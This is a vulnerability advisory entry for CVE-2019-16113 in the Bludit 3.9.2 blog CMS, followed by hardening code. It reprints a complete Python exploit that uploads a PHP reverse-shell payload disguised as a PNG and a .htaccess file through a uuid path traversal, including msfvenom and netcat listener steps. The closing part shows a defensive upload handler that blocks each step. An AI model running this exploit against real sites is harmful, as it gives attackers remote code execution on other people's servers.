Bludit Security Vulnerability

Vulnerability ID 1734476  Vulnerability type Code injection
Published 2020-07-30  Updated 2020-07-30
CVE ID CVE-2019-16113

CNNVD-ID CNNVD-201909-283
Platform N/A  CVSS score N/A
|Source
https://cxsecurity.com/issue/WLB-2020070142
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201909-283
|Details
Bludit is an open-source, lightweight blog content management system (CMS).
Bludit 3.9.2 contains a security vulnerability. A remote attacker can exploit it through the bl-kernel/ajax/upload-images.php file to execute code.
|Exploit (EXP)
# Title: Bludit 3.9.2 - Directory Traversal
# Author: James Green
# Date: 2020-07-20
# Vendor Homepage: https://www.bludit.com
# Software Link: https://github.com/bludit/bludit
# Version: 3.9.2
# Tested on: Linux Ubuntu 19.10 Eoan
# CVE: CVE-2019-16113
#
# Special Thanks to Ali Faraj (@InfoSecAli) and authors of MSF Module https://www.exploit-db.com/exploits/47699
#### USAGE ####
# 1. Create payloads: .png with PHP payload and the .htaccess to treat .pngs like PHP
# 2. Change hardcoded values: URL is your target webapp, username and password is admin creds to get to the admin dir
# 3. Run the exploit
# 4. Start a listener to match your payload: `nc -nlvp 53`, meterpreter multi handler, etc
# 5. Visit your target web app and open the evil picture: visit url + /bl-content/tmp/temp/evil.png
#!/usr/bin/env python3
import requests
import re
import argparse
import random
import string
import base64
from requests.exceptions import Timeout

url = 'http://127.0.0.1'  # CHANGE ME
username = 'James'  # CHANGE ME
password = 'Summer2020'  # CHANGE ME

# msfvenom -p php/reverse_php LHOST=127.0.0.1 LPORT=53 -f raw -b '"' > evil.png
# echo -e "<?php $(cat evil.png)" > evil.png
payload = 'evil.png'  # CREATE ME

# echo "RewriteEngine off" > .htaccess
# echo "AddType application/x-httpd-php .png" >> .htaccess
payload2 = '.htaccess'  # CREATE ME


def login(url, username, password):
    """ Log in with provided admin creds, grab the cookie once authenticated """
    session = requests.Session()
    login_page = session.get(url + "/admin/")
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"',
                           login_page.text
                           ).group(1)
    cookie = ((login_page.headers["Set-Cookie"]).split(";")[0].split("=")[1])
    data = {"save": "",
            "password": password,
            "tokenCSRF": csrf_token,
            "username": username}
    headers = {"Origin": url,
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
               "Upgrade-Insecure-Requests": "1",
               "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0",
               "Connection": "close",
               "Referer": url + "/admin/",
               "Accept-Language": "es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3",
               "Accept-Encoding": "gzip, deflate",
               "Content-Type": "application/x-www-form-urlencoded"
               }
    cookies = {"BLUDIT-KEY": cookie}
    response = session.post(url + "/admin/",
                            data=data,
                            headers=headers,
                            cookies=cookies,
                            allow_redirects=False
                            )
    print("cookie: " + cookie)
    return cookie


def get_csrf_token(url, cookie):
    """ Grab the CSRF token from an authed session """
    session = requests.Session()
    headers = {"Origin": url,
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
               "Upgrade-Insecure-Requests": "1",
               "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0",
               "Connection": "close",
               "Referer": url + "/admin/",
               "Accept-Language": "es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3",
               "Accept-Encoding": "gzip, deflate"}
    cookies = {"BLUDIT-KEY": cookie}
    response = session.get(url + "/admin/dashboard",
                           headers=headers,
                           cookies=cookies
                           )
    csrf_token = response.text.split('var tokenCSRF = "')[1].split('"')[0]
    print("csrf_token: " + csrf_token)
    return csrf_token


def upload_evil_image(url, cookie, csrf_token, payload, override_uuid=False):
    """ Upload files required to execute PHP from malicious image files. Payload and .htaccess """
    session = requests.Session()
    files = {"images[]": (payload,
                          open(payload, "rb"),
                          "multipart/form-data",
                          {"Content-Type": "image/png", "filename": payload}
                          )}
    if override_uuid:
        data = {"uuid": "../../tmp/temp",
                "tokenCSRF": csrf_token}
    else:
        # On the vuln app, this line occurs first:
        # Filesystem::mv($_FILES['images']['tmp_name'][$uuid], PATH_TMP.$filename);
        # Even though there is a file extension check, it won't really stop us
        # from uploading the .htaccess file.
        data = {"tokenCSRF": csrf_token}
    headers = {"Origin": url,
               "Accept": "*/*",
               "X-Requested-With": "XMLHttpRequest",
               "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0",
               "Connection": "close",
               "Referer": url + "/admin/new-content",
               "Accept-Language": "es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3",
               "Accept-Encoding": "gzip, deflate",
               }
    cookies = {"BLUDIT-KEY": cookie}
    response = session.post(url + "/admin/ajax/upload-images", data=data, files=files, headers=headers, cookies=cookies)
    print("Uploading payload: " + payload)


if __name__ == "__main__":
    cookie = login(url, username, password)
    token = get_csrf_token(url, cookie)
    upload_evil_image(url, cookie, token, payload, True)
    upload_evil_image(url, cookie, token, payload2)
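The exploit above depends on two server-side defects: the uuid request parameter is used as a directory name without sanitisation (so "../../tmp/temp" escapes the intended folder), and the uploaded file is moved onto disk before the extension check runs (so a .htaccess file that turns .png into executable PHP lands there anyway). The following is an added example of how an upload handler closes both holes by validating first and only then computing a confined destination path. It is not Bludit's code: the allowlist, the magic-byte table, the uuid pattern and all function names are assumptions made for illustration.

```python
import os
import re
from pathlib import Path
from typing import Tuple

# Hardening model for an image-upload endpoint in the style of
# bl-kernel/ajax/upload-images.php. Everything below is illustrative,
# not Bludit's implementation.

# Allowlist of image extensions (assumed set for this example).
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}

# Leading bytes a genuine file of each type must carry (constructed table).
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}

# A page identifier is an opaque token: letters, digits, "_" or "-" only,
# so it can never carry "/" or ".." (assumed format for this example).
UUID_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def check_upload(uuid: str, filename: str, head: bytes) -> Tuple[bool, str]:
    """Validate every client-controlled value BEFORE anything touches disk.

    Returns (accepted, reason). Called with the first bytes of the file
    so the declared type can be compared against the real content.
    """
    if not UUID_RE.fullmatch(uuid):
        return False, "uuid must be an identifier, not a path"
    # Any directory component smuggled into the name is a rejection, not
    # something to silently strip.
    base = os.path.basename(filename.replace("\\", "/"))
    if base != filename or base in ("", ".", ".."):
        return False, "filename must not contain path components"
    if base.startswith("."):
        return False, "dotfiles such as .htaccess are not images"
    ext = Path(base).suffix.lower()
    if ext not in ALLOWED_EXT:
        return False, f"extension {ext or '<none>'} not in allowlist"
    if not head.startswith(MAGIC[ext]):
        return False, "content does not match the declared image type"
    return True, "ok"


def destination(upload_root: Path, uuid: str, filename: str) -> Path:
    """Build the target path and prove it stays under upload_root."""
    root = upload_root.resolve()
    target = (root / uuid / filename).resolve()
    if root not in target.parents:
        raise ValueError("destination escapes the upload root")
    return target


def destination_is_confined(upload_root: str, uuid: str, filename: str) -> bool:
    """Convenience wrapper: True if the computed path stays inside the root."""
    try:
        destination(Path(upload_root), uuid, filename)
        return True
    except ValueError:
        return False


def handle_upload(upload_root: Path, uuid: str, filename: str, data: bytes) -> Path:
    """Order matters: validate, compute a confined path, then write."""
    ok, reason = check_upload(uuid, filename, data[:8])
    if not ok:
        raise ValueError(reason)
    target = destination(upload_root, uuid, filename)
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_bytes(data)
    return target


if __name__ == "__main__":
    # Constructed inputs mirroring the two requests the exploit sends.
    print(check_upload("../../tmp/temp", "evil.png", b"\x89PNG\r\n\x1a\n"))
    print(check_upload("page-1", ".htaccess", b"RewriteEngine off"))
    print(check_upload("page-1", "evil.png", b"<?php sy"))
    print(check_upload("page-1", "photo.png", b"\x89PNG\r\n\x1a\n"))
```

The traversal attempt fails at the uuid check, the .htaccess upload fails at the dotfile check, and a PHP payload carrying a .png name fails the magic-byte comparison; only a file that is actually a PNG reaches the filesystem, and the resolve()-and-parents check gives a second, independent guarantee that the final path stays under the upload root even if an earlier check were weakened later.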
|References

Source: MISC

Link: https://github.com/bludit/bludit/issues/1081